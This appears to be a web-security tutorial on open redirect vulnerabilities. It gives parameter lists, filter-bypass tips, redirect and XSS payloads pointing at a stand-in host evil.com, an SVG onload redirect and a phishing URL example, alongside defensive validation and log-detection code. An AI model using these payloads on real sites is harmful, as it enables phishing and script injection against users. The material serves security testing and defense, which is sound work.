Open Redirect

Open Redirect (also known as Unvalidated Redirects and Forwards) occurs when a web application accepts user-supplied input and redirects the user to an arbitrary URL without proper validation.

Basic info - Open Redirect

How to find entry points to test?

  • Burp Proxy history & Burp Sitemap (look at URLs with parameters)

  • Google dorking. E.g: inurl:redirectUrl=http site:target.com

  • Functionalities usually associated with redirects:

    • Login, Logout, Register & Password reset pages

    • Change site language

    • Links in emails

  • Read JavaScript code

  • Bruteforcing

    • Look for hidden redirect parameters, e.g.:

    • /redirect?url={payload}&next={payload}&redirect={payload}&redir={payload}&rurl={payload}&redirect_uri={payload}

    • /?url={payload}&next={payload}&redirect={payload}&redir={payload}&rurl={payload}&redirect_uri={payload}

Responses to look for when fuzzing


Tips

  • Try using the same parameter twice: ?next=whitelisted.com&next=google.com

  • If periods are filtered, use an IPv4 address in decimal notation (converter: http://www.geektools.com/geektools-cgi/ipconv.cgi)

  • Try a double-URL and triple-URL encoded version of payloads

  • Try redirecting to an IP address (instead of a domain) using different notations: IPv6, IPv4 in decimal, hex or octal

  • For XSS, try replacing alert(1) with prompt(1) & confirm(1)

  • If the file extension is checked, try ?image_url={payload}/.jpg

  • Try target.com/?redirect_url=.uk (or [any_param]=.uk). If it redirects to target.com.uk, then it’s vulnerable! target.com.uk and target.com are different domains.

  • Use the U+202E RIGHT-TO-LEFT OVERRIDE character (%E2%80%AE in UTF-8): https://whitelisted.com@%E2%80%[email protected]


Identifying Open Redirect Vulnerabilities

Common Parameters to Test

Many applications use redirection parameters like:

/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
success=https://www.verylazytech.com
data=https://www.verylazytech.com
qurl=https://www.verylazytech.com
login=https://www.verylazytech.com
logout=https://www.verylazytech.com
ext=https://www.verylazytech.com
clickurl=https://www.verylazytech.com
goto=https://www.verylazytech.com
rit_url=https://www.verylazytech.com
forward_url=https://www.verylazytech.com
@https://www.verylazytech.com
forward=https://www.verylazytech.com
pic=https://www.verylazytech.com
callback_url=https://www.verylazytech.com
jump=https://www.verylazytech.com
jump_url=https://www.verylazytech.com
click?u=https://www.verylazytech.com
originUrl=https://www.verylazytech.com
origin=https://www.verylazytech.com
Url=https://www.verylazytech.com
desturl=https://www.verylazytech.com
u=https://www.verylazytech.com
page=https://www.verylazytech.com
u1=https://www.verylazytech.com
action=https://www.verylazytech.com
action_url=https://www.verylazytech.com
Redirect=https://www.verylazytech.com
sp_url=https://www.verylazytech.com
service=https://www.verylazytech.com
recurl=https://www.verylazytech.com
j?url=https://www.verylazytech.com
url=//https://www.verylazytech.com
uri=https://www.verylazytech.com
allinurl:https://www.verylazytech.com
q=https://www.verylazytech.com
link=https://www.verylazytech.com
src=https://www.verylazytech.com
tc?src=https://www.verylazytech.com
linkAddress=https://www.verylazytech.com
location=https://www.verylazytech.com
burl=https://www.verylazytech.com
request=https://www.verylazytech.com
backurl=https://www.verylazytech.com
RedirectUrl=https://www.verylazytech.com
ReturnUrl=https://www.verylazytech.com

If these parameters are processed without validation, they might be vulnerable.

Passive Detection

  1. Check URL parameters – Look for redirect-related keywords in URLs.

  2. Analyze HTTP responses – Look for 302 Found or 301 Moved Permanently responses.

  3. Check developer console (F12) and network traffic – Inspect redirects.
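To make the passive checks above concrete, here is an added example (not part of the original page) in Python that runs over constructed request/response records and flags redirect responses whose Location header points off-site and echoes a value from the request's query string. SITE_HOSTS, SAMPLE_LOG and the function names are assumptions made for the example.

```python
# Added example, not code from the original page: find open-redirect
# exploitation in proxy/access log records (request, status, Location).
from urllib.parse import parse_qs, unquote, urlparse

# Hosts that belong to the site being monitored (assumed for the example).
SITE_HOSTS = {"example.com", "www.example.com"}

# Constructed sample records: (request path+query, status code, Location header).
SAMPLE_LOG = [
    ("/login?redirect=/dashboard", 302, "/dashboard"),
    ("/login?redirect=https://evil.com", 302, "https://evil.com"),
    ("/login?redirect=//evil.com", 302, "//evil.com"),
    ("/out?u=https://www.example.com/help", 301, "https://www.example.com/help"),
    ("/profile", 200, ""),
    ("/login?next=%2F%2Fevil.com", 302, "//evil.com"),
]

REDIRECT_STATUSES = {301, 302, 303, 307, 308}


def location_host(location: str) -> str:
    """Host a browser would navigate to for a Location value ('' if same-origin path)."""
    loc = location.replace("\\", "/")          # browsers treat '\' like '/'
    if loc.startswith("//"):                    # scheme-relative form
        loc = "https:" + loc
    try:
        parsed = urlparse(loc)
    except ValueError:                          # malformed IPv6 literal etc.
        return ""
    return (parsed.hostname or "").lower()


def suspicious_redirects(records):
    """Return records where an off-site Location host is echoed from a query parameter."""
    hits = []
    for path, status, location in records:
        if status not in REDIRECT_STATUSES or not location:
            continue
        host = location_host(location)
        if not host or host in SITE_HOSTS:
            continue                            # same-site redirect, not interesting
        params = parse_qs(urlparse(path).query)
        # Which query parameters, once decoded, resolve to the same external host?
        echoed = [
            name for name, values in params.items()
            if any(location_host(unquote(v)) == host for v in values)
        ]
        if echoed:
            hits.append({"path": path, "host": host, "params": echoed})
    return hits


if __name__ == "__main__":
    for hit in suspicious_redirects(SAMPLE_LOG):
        print(f"{hit['path']} -> {hit['host']} via {', '.join(hit['params'])}")
```

Run on the constructed log, the function reports the three records where an external host (evil.com) was taken from redirect or next; the same-site and non-redirect records are ignored. The parameter names it surfaces are exactly the ones worth adding to a request-level allowlist or alert.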

Active Testing (Manual and Automated)

  • Modify the URL and inject an external domain:

    https://example.com/login?redirect=https://evil.com

  • Use Burp Suite's Intruder to fuzz redirection parameters.

  • Use a tool such as Oralyzer:

    python3 oralyzer.py -u "https://example.com?redirect="

Exploiting Open Redirect Vulnerabilities

Basic Open Redirect Exploitation

If an application blindly trusts user input, you can redirect a victim to a malicious website:

https://example.com/login?redirect=http://evil.com

or use encoded URLs:

https://example.com/login?redirect=%68%74%74%70%3a%2f%2fevil.com

Redirect to Localhost (Bypass Authentication)

If an application allows redirection to localhost:

https://example.com/login?redirect=http://127.0.0.1

It can be used to:

  • Redirect an admin panel login to an internal resource.

  • Exploit internal APIs (in SSRF attacks).

URL Format Bypass

Some applications attempt to restrict external domains but allow different URL formats:

https://example.com/login?redirect=//evil.com
https://example.com/login?redirect=//[email protected]

  • //evil.com is a scheme-relative URL: the browser reuses the current page's scheme, so on an HTTPS site it resolves to https://evil.com.

  • Anything before the @ is parsed as userinfo (credentials), not as the host, so a check that only looks for trusted.com somewhere in the string is fooled: the browser navigates to the host that follows the @.


Open Redirect to XSS

Some browsers allow JavaScript-based redirects if improperly filtered.

Basic Payloads

javascript:alert(1)

or, to bypass naive filters that only look for the literal string "javascript":

java%0d%0ascript%0d%0a:alert(0)

Using Comments and Encoding

javascript://sub.domain.com/%0Aalert(1)
javascript://%250Aalert(1)
javascript://%250A1?alert(1):0

SVG File Exploit (Open Redirect via File Upload)

Some applications allow uploading SVG files that can trigger JavaScript execution:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg onload="window.location='http://evil.com'" xmlns="http://www.w3.org/2000/svg">
</svg>

If the website automatically loads SVG files, the redirection will be triggered.


Exploiting Open Redirect for Phishing

Attackers can craft realistic-looking URLs to trick users:

https://bank.com?redirect=https://bank.com.evil.com

Users might not notice the difference and enter their credentials.


Tools for Automating Open Redirect Testing

Oralyzer (Automated Open Redirect Scanner)

Fuzzing with Payload Lists


Defense Against Open Redirects

Input Validation

  • Only allow whitelisted domains for redirection:

    from urllib.parse import urlparse
    allowed_domains = ["mysafedomain.com"]
    # netloc is the host part; "//evil.com" has netloc "evil.com" and is rejected too
    parsed_url = urlparse(redirect_param)  # redirect_param: the user-supplied value
    if parsed_url.netloc not in allowed_domains:
        return "Invalid redirect URL"

Use Relative URLs Instead of Absolute

Instead of:

header("Location: ".$_GET['redirect']);

Use:

header("Location: /dashboard");

URL Sanitization

Ensure the redirect URL starts with a trusted domain:

// The trailing (\/|$) matters: without it "https://mysafedomain.com.evil.com"
// and "https://mysafedomain.com@evil.com" also match the prefix
if (!preg_match("/^https:\/\/mysafedomain\.com(\/|$)/", $_GET['redirect'])) {
    die("Invalid redirect URL");
}
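The two checks above (a host allowlist, and a regex anchored at the start of the URL) each address part of the problem, but the bypasses listed earlier on this page (double and triple URL-encoding, //host and backslash forms, javascript: schemes, the @ userinfo trick, look-alike suffixes such as .uk, IPs in decimal notation, the %0d%0a and U+202E characters) need to be handled together. The following added example, which is not code from the original page, is a Python validator that does so and falls back to a fixed path instead of erroring. ALLOWED_HOSTS, SAFE_FALLBACK and the function names are assumptions made for the example.

```python
# Added example, not code from the original page: a redirect validator that
# closes the bypasses listed on this page. Names below are assumptions.
from urllib.parse import unquote, urlparse

ALLOWED_HOSTS = {"mysafedomain.com", "www.mysafedomain.com"}
SAFE_FALLBACK = "/dashboard"
MAX_DECODE_ROUNDS = 3  # enough to undo double- and triple-URL-encoding


def fully_decode(value: str) -> str:
    """Undo repeated percent-encoding so %252F or %25252F cannot hide a '/'."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def safe_redirect_target(user_value: str) -> str:
    """Return a destination that is safe to place in a Location header.

    Anything that is not clearly a same-site path or an absolute URL on an
    allowed host is replaced by SAFE_FALLBACK, so the user still lands
    somewhere sensible instead of on an error page.
    """
    if not user_value:
        return SAFE_FALLBACK
    candidate = fully_decode(user_value).strip()

    # Control characters (the %0d%0a trick) and the U+202E right-to-left
    # override used to disguise hosts are never legitimate in a redirect.
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F or ch == "\u202e" for ch in candidate):
        return SAFE_FALLBACK

    # Browsers treat a backslash like a slash in the authority part; urlparse
    # does not, so normalise first ("/\evil.com" becomes "//evil.com").
    candidate = candidate.replace("\\", "/")

    # Case 1: a relative path on our own origin. Exactly one leading "/" so
    # that the scheme-relative "//evil.com" form is not accepted.
    if candidate.startswith("/") and not candidate.startswith("//"):
        return candidate

    # Case 2: an absolute URL. Only http(s); this refuses javascript:, data:
    # and anything without a scheme.
    try:
        parsed = urlparse(candidate)
    except ValueError:  # e.g. a malformed IPv6 literal in the host
        return SAFE_FALLBACK
    if parsed.scheme not in ("http", "https"):
        return SAFE_FALLBACK
    # Userinfo ("mysafedomain.com@evil.com") and explicit ports are refused
    # outright rather than parsed, which keeps the host comparison simple.
    if "@" in parsed.netloc or ":" in parsed.netloc:
        return SAFE_FALLBACK
    # Exact host match: "mysafedomain.com.uk", "mysafedomain.com.evil.com" and
    # IP addresses in decimal, hex or octal notation are all different hosts.
    host = (parsed.hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        return SAFE_FALLBACK
    return candidate


if __name__ == "__main__":
    for value in ["/account", "//evil.com", "https://mysafedomain.com.uk",
                  "javascript:alert(1)", "%2F%2Fevil.com"]:
        print(f"{value!r:32} -> {safe_redirect_target(value)}")
```

Design note: the validator is deliberately strict about what it accepts rather than trying to enumerate bad inputs, which is why a bare path without a leading slash, a port, or userinfo all fall through to the fallback. Decoding before validation is what makes the "try a double- or triple-encoded payload" tip from earlier on this page ineffective.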

Code examples

.Net

// Fixed, server-chosen destination: no user input reaches the Location header
Response.Redirect("~/mysafe-subdomain/login.aspx");

Java

// HttpServletResponse.sendRedirect() is the Servlet API call that emits a 302
response.sendRedirect("http://www.verylazytech.com");

PHP

<?php
/* browser redirection to a fixed, server-chosen URL */
header("Location: http://www.verylazytech.com");
exit;
?>
